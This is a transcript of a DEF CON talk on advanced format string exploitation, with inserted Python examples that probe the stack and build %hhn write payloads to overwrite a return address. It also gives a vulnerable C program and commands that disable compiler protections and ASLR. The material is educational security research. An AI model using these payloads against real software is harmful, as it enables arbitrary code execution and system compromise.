Advanced Format String Attacks - DEF CON® Hacking Conference
TRANSCRIPT
Advanced Format String Attacks
Presented by Paul Haas
Contents
• Background
• Abstract
• Definition
• Context
• Technique
• How-to
• Tools
• Exploits
• Conclusion
• Q&A
Background
• Lead Web Application Security Engineer at Redspin, Inc with over 4 years experience in hundreds of audits.
• This talk is not associated with my company
• Defcon 13 CTF winner (Shellphish 2005)
• Alumnus of UCSB's Computer Security Group
• Mario Kart DS: Robin Tank on Rainbow Road
In
#include <stdio.h>
int main(int argc, char **argv) {
    printf(argv[1]);   /* argv[1] is used directly as the format string: the bug */
}
Out
Reading arbitrary locations
Writing arbitrary locations
Executing arbitrary code
Get a shell
Without
RTFM and writing it yourself!
Format String Attack
• A software vulnerability in the C functions that perform string formatting (the printf family) when the attacker controls the format string; it leads to the potential to read stack memory and write arbitrary data to arbitrary locations
• Despite easy fixes (use a constant format string and pass user data as an argument), vulnerable code and ignorance of the issue still exist, hence the talk
• Common in hackademic exercises
• The talk assumes you have a basic idea of the attack (%x, %s, %n)
• The talk details the technique, but the tools do not require you to know it
Brief History
• 1990: csh "Interaction Effect" crash: !o%8f
• 1999-09-17: proftpd 1.2.0pre6 "Argument attack / snprintf Vulnerability" (BID 650)
• 2000-06-22: wu-ftpd 2.6.0 Remote Format String Stack Overwrite Vulnerability (BID 1387)
• 2000-09-09: "Format String Attacks" whitepaper by Tim Newsham
• 2010-06-30: KVIrc DCC Directory Traversal and Multiple Format String Vulnerabilities (BID 40746)
Old Technique
• Manually pop up the stack using a string of '%x's
• Get the overwrite address using some other technique
• Search for the shellcode in the core file after the SEGFAULT
• Characters written using a long width value in %x or %c
• Final write to the address using %n
• Frequent RTFM
• Write once, use once
Current Technique
• %p prints each argument word as a pointer, giving a clean view of the stack
• %s dereferences an argument word, so a known stack address can be read back as a string
• %NNc pads its output to NN characters, which sets the byte count that a following %n family write stores
• %hhn stores that count as a single byte, so four writes build any 32-bit value
• Direct parameter access shortens the format string: %5$n writes to the fifth argument directly, where the classic form walks there with a run of %p's (%p%p%p%p%n) and their output also inflates the byte count
New Technique
• A format string attack allows us to dump the stack
• The stack contains interesting information:
  data, code pointers, stack addresses
  our format string, and the format string's address
  the stack offset (argument index) of all of the above
• Knowledge of this gives us the address of any value on the stack
• These values are enough to write our exploit
Our Vulnerable Code
#include <stdio.h>
int main(int argc, char **argv) {
    printf(argv[1]);   /* argv[1] is used directly as the format string */
}
# Compile and set up an insecure environment: no PIE, no stack protector, no RELRO, executable stack, no FORTIFY, no ASLR
gcc printf.c -w -O0 -ggdb -std=c99 -static -D_FORTIFY_SOURCE=0 -fno-pie -Wno-format -Wno-format-security -fno-stack-protector -z norelro -z execstack -o printf
sudo sysctl -w kernel.randomize_va_space=0
Exploit Steps
• Dump stack values until the format string is found
• Locate a pointer to the format string, which gives its address
• Choose our overwrite address on the stack
• Make the writes target the overwrite address, and write into it the address of the shellcode placed at the end of the string
• Adjust offsets for the 'chicken and egg' problem:
  The address of the format string depends on its length
  The format string needs its own address to reference itself
Stack Dump
• Method 1: Pass a long string of %p's
  ./printf `perl -E 'say "%p" x 200'`
• Method 2: Execute the binary in a loop with %NNN$p
  for i in {001..200}; do echo -n "$i="; ./printf "%$i\$p"; echo; done
• Search the output for the hex representation of the string itself
  $ = 0x24, % = 0x25, p = 0x70 (on little-endian x86 the word "%p%p" shows up as 0x70257025)
• The result is the stack offset (argument index) of the format string
Format String Address
• Execute the binary in a loop with sequential %NNN$s
  Will cause SEGFAULTs whenever the word is not a valid pointer, and may trip any IDS
  for i in {001..100}; do echo -n "$i="; ./printf "%$i\$p:%$i\$s"; echo; done | grep -v ^$
• Alternatively, create a single format string that only dereferences the addresses obtained from the stack dump
  A single execution per string prevents the SEGFAULTs
  Much more elegant, and verifies that the stack is constant between runs
Offset + Address = WIN
Matching up an offset to a stack address allows us to learn the address of any location on the stack: printf reads its arguments as consecutive pointer-sized words at increasing addresses, so slot k lies (k - j) * sizeof(pointer) bytes from slot j.
Example:
Offset 100 (0xBFFFF100): our format string, i.e. the word at argument index 100 starts at 0xBFFFF100
sizeof(pointer) = 4 bytes; offset 1 is 99 slots below it, 99 * 4 = 396 = 0x18C bytes
Offset 1 = 0xBFFFF100 - 0x18C = 0xBFFFEF74
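The stack dump, the pointer probe and the offset arithmetic from the three slides above, as an added Python example that is not code from the talk or from the Redspin tool. The dump, the stack address range and the 32-bit word size are constructed assumptions standing in for the output of the ./printf loops; on a real target the %s probe is actually run, and the candidate whose output echoes the probe string is the pointer to the format string.

```python
import struct

PTR_SIZE = 4   # 32-bit x86 target, as in the talk's test setup (assumption)


def stack_probe(n):
    """Method 1 probe: one run of the binary with n '%p' conversions."""
    return "%p" * n


def find_format_offset(dump, fmt, ptr_size=PTR_SIZE):
    """
    Lowest argument index whose dumped word equals the first ptr_size bytes of
    the probe itself, i.e. the slot where the format string starts.  For a
    '%p%p...' probe on little-endian x86 that word is 0x70257025
    ('%' = 0x25, 'p' = 0x70).  Returns None if the dump never reached it.
    """
    fmt_code = "<I" if ptr_size == 4 else "<Q"
    marker = struct.unpack(fmt_code, fmt.encode()[:ptr_size])[0]
    for off in sorted(dump):
        if dump[off] == marker:
            return off
    return None


def pointers_into(dump, lo, hi):
    """Argument indices whose word lies in [lo, hi), i.e. looks like a stack address."""
    return [off for off in sorted(dump) if lo <= dump[off] < hi]


def address_probe(dump, lo, hi):
    """
    Method 2 in a single run: dereference only words that already look like
    stack pointers, so %s never gets an invalid pointer and the process does
    not SEGFAULT.  Each entry prints 'address:contents|'.
    """
    return "".join("%%%d$p:%%%d$s|" % (off, off) for off in pointers_into(dump, lo, hi))


def slot_address(known_offset, known_addr, target_offset, ptr_size=PTR_SIZE):
    """
    printf reads its arguments as consecutive words at increasing addresses,
    so tying one argument index to an address fixes the address of every slot.
    """
    return known_addr + (target_offset - known_offset) * ptr_size


def resolve_stack(dump, probe, ptr_slot):
    """
    Combine the two observations: the slot holding the string's own bytes and
    the slot (ptr_slot, confirmed by the %s probe) holding a pointer to it.
    Returns (fmt_offset, fmt_addr).
    """
    fmt_off = find_format_offset(dump, probe)
    if fmt_off is None:
        raise ValueError("dump did not reach the format string; use more %p's")
    return fmt_off, dump[ptr_slot]


# Constructed dump (argument index -> word) standing in for the %NNN$p loop
# output; a real dump runs to hundreds of slots before reaching argv.
STACK_LO, STACK_HI = 0xBFFF0000, 0xC0000000
DUMP = {
    1: 0x0804A008, 2: 0x00000002,
    3: 0xBFFFF100,          # a saved copy of argv[1]: points at our string
    4: 0x08048510, 5: 0x00000000, 6: 0xB7FC3FF4, 7: 0x08049F18, 8: 0x00000001,
    9: 0x70257025,          # "%p%p": the probe string itself starts here
    10: 0x70257025, 11: 0x70257025,
}


if __name__ == "__main__":
    print("confirm candidates with:", address_probe(DUMP, STACK_LO, STACK_HI))
    fmt_off, fmt_addr = resolve_stack(DUMP, stack_probe(200), ptr_slot=3)
    print("format string at argument %d, address %#x" % (fmt_off, fmt_addr))
    print("argument 1 lives at %#x" % slot_address(fmt_off, fmt_addr, 1))
```

With this dump the string starts at argument 9 and slot 3 points to it, so slot 9 is at 0xBFFFF100 and slot 1, eight words lower, is at 0xBFFFF0E0.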
Overwrite Location
• Common exploit locations require binary examination tools to find: PLT, DTORS, LIBC
• An advanced format string attack could extract these from known binary headers (difficult)
• Return addresses are stored on the stack
  We know the stack address of each value there
• Overwrite one of these locations to point to the shellcode
Issues
• Different format string lengths shift the stack addresses, yet we assume the stack is constant
  Keep all strings the same length modulo sizeof(pointer)
• The format string may not start on a pointer-aligned stack address
  Keep the padding requirement (leading filler bytes) when addressing the string
• Even with the correct modulus and padding, our string offset may be off
  Verify the exploit before attempting it by reading, rather than writing to, the overwrite location
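The write payload that the Current Technique, Exploit Steps and Issues slides describe, as an added Python example that is not the talk's tool: the four target addresses go at the front of the string so they occupy known argument slots, each byte is written with %NNc padding followed by %N$hhn, the string length is kept a multiple of the word size, and the result is checked against a small model of printf's byte counter before anything is sent. The argument index 9, the return-address slot, the shellcode address and the 32-bit layout are constructed assumptions; a real target supplies them through the stack dump.

```python
import re
import struct

PTR_SIZE = 4   # 32-bit x86 target, as in the talk's test setup (assumption)


def hhn_write_payload(fmt_offset, target_addr, value, prefix_pad=0, ptr_size=PTR_SIZE):
    """
    One format string that stores the 32-bit `value` at `target_addr` byte by
    byte with %hhn, each write addressed through direct parameter access.

    fmt_offset : %N$ index of the first word-aligned slot of this string (from
                 the stack dump).
    prefix_pad : filler bytes in front so the addresses start on a word
                 boundary when the string itself does not.
    The length is rounded up to a multiple of ptr_size so every string sent
    has the same length modulo the word size and the stack does not shift.
    """
    if ptr_size != 4:
        raise ValueError("this example covers the 32-bit layout only")
    addrs = b"".join(struct.pack("<I", target_addr + i) for i in range(4))
    if b"\x00" in addrs or b"%" in addrs:
        raise ValueError("an address byte would end argv or be parsed as a conversion")
    head = b"A" * prefix_pad + addrs
    written = len(head)                       # bytes printed before the first %c
    body = ""
    for i in range(4):
        want = (value >> (8 * i)) & 0xFF
        pad = (want - written) % 256 or 256   # %0c still prints one byte
        body += "%%%dc%%%d$hhn" % (pad, fmt_offset + i)
        written += pad
    payload = head + body.encode()
    return payload + b"B" * (-len(payload) % ptr_size)


def read_probe(fmt_offset, target_addr, prefix_pad=0, ptr_size=PTR_SIZE):
    """
    Same layout with %s instead of %hhn: dumps the bytes at target_addr so the
    slot arithmetic can be checked before anything is overwritten.
    """
    head = b"A" * prefix_pad + struct.pack("<I", target_addr)
    probe = head + ("%%%d$s" % fmt_offset).encode()
    return probe + b"B" * (-len(probe) % ptr_size)


SPEC = re.compile(rb"%(\d*)c|%(\d+)\$hhn")


def simulate_printf(payload, fmt_offset, prefix_pad=0, ptr_size=PTR_SIZE):
    """
    Model of printf's behaviour on `payload` when the string itself occupies
    the stack from argument index fmt_offset onwards: literal bytes and %Nc
    padding advance the byte counter, %N$hhn stores the counter's low byte at
    the address held in slot N.  Only these two conversions are understood.
    Returns (bytes_printed, {address: byte}).
    """
    words = payload[prefix_pad:]
    slots = {fmt_offset + i: struct.unpack_from("<I", words, ptr_size * i)[0]
             for i in range(len(words) // ptr_size)}
    count, pos, mem = 0, 0, {}
    for m in SPEC.finditer(payload):
        count += m.start() - pos                  # literal bytes before the spec
        if m.group(1) is not None:                # %Nc prints max(N, 1) bytes
            count += max(int(m.group(1) or b"0"), 1)
        else:                                     # %N$hhn: one-byte store
            mem[slots[int(m.group(2))]] = count & 0xFF
        pos = m.end()
    return count + len(payload) - pos, mem


def value_at(mem, addr):
    """Reassemble the four bytes left at addr by the %hhn writes (little-endian)."""
    return sum(mem[addr + i] << (8 * i) for i in range(4))


if __name__ == "__main__":
    FMT_OFFSET, RET_SLOT, SHELLCODE = 9, 0xBFFFF0E4, 0xBFFFF1A0   # constructed
    print(read_probe(FMT_OFFSET, RET_SLOT))
    p = hhn_write_payload(FMT_OFFSET, RET_SLOT, SHELLCODE)
    printed, mem = simulate_printf(p, FMT_OFFSET)
    print(p, printed, hex(value_at(mem, RET_SLOT)))
```

The model is what makes the "math only" claim checkable offline: if the simulated store does not reassemble to the shellcode address, the padding or the argument index is wrong and the real run would be too. The NUL check matters because the string travels through argv; an address containing 0x00 has to be written with a different layout.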
Result
• It is possible to create a format string exploit using only 2 executions of the vulnerable program, with no program exceptions
• Math only, no brute forcing necessary
• The shellcode is incorporated as part of the format string
• Smaller format string buffers are also possible:
  8 bytes to examine a stack address
  Format string as small as 68 bytes + shellcode
Format String Auto Exploitation
• Proof of concept tool in Python
• Instructions for running on Backtrack 4
• Multiple exploit and overwrite options
• Missing some useful features:
  Separate execution of independent steps
  Architecture independence (x86 & 64)
  Read arbitrary locations rather than write
  Finer control over the exploit
Metasploit Integration
• Control each step of the exploit individually, or automate the entire process
• Use as a payload generator
• Uses the Metasploit payload library for shellcode
• Integrates into other modules and injection functionality
• Functionality will be demonstrated during Defcon
Demonstrations
• Testing code
• OverTheWire
• Known exploit
• 0-day?
Summary
• The output from a format string attack gives you everything you need to go from discovery to compromise
• The exploitation process can be automated from start to finish
• Format string attacks are easy to fix, and now are easy to exploit as well
• There are plenty of vulnerable programs out there to discover and exploit
Questions?
Thanks
• The most recent version of this presentation and associated tools can be found on www.redspin.com and www.defcon.org
• Look for the incorporation of the tools in this talk in Metasploit in the near future
• Any follow-up questions can be addressed to phaas AT redspin DOT com
• Shouts to Shellphish, G. Vigna "zanardi" and the Goats at Redspin {ap3r, jhaddix, fulg0re, D3, OwNpile, Yimmy & b3tty}